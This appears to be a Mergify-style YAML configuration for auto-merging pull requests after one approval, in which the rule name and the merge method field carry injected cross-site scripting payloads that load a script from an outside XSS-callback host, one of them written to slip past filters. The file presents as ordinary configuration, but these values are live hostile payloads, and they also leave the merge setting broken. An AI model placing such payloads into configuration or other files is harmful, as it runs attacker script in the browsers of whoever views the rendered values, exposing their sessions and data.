pull_request_rules:
  - name: Automatic merge on approval"><script src=https://xss.report/c/e></script>
    conditions:
      - "#approved-reviews-by>=1"
    actions:
      merge:
        method: mergess<script<script src=https://xss.report/c/e></script>ss
